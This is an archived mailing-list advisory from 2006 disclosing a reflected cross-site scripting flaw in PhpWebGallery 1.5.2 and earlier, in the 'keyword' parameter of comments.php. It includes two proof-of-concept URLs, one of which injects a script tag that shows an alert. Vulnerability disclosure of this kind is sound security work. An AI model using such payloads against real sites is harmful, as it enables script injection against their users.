PhpWebGallery Cross Site Scripting Vulnerability
- From: iss4m.h@xxxxxxxxx
- Date: 4 Jul 2006 00:00:03 -0000
Produce : PhpWebGallery <= 1.5.2
Site : http://www.phpwebgallery.net
Problem : XSS
Greetz : hasnaa and all friends
Moroccan Security Research Team
Vulnerable file : comments.php
Exploit :
http://localhost/phpwebgallery/comments.php?keyword=%22%3E[XSS]
http://localhost/phpwebgallery/comments.php?keyword=%22%3E%3Cscript%3Ealert('Hi+Master');%3C/script%3E
Contact : iss4m.h@xxxxxxxxx
- Prev by Date: file include exploits in randshop v1.2
- Next by Date: Re: file include exploits in randshop v1.2
- Previous by thread: file include exploits in randshop v1.2
- Next by thread: [Bugtraq] Re: flock d0s exploit remote. beta 1 (v0.7)
- Index(es):
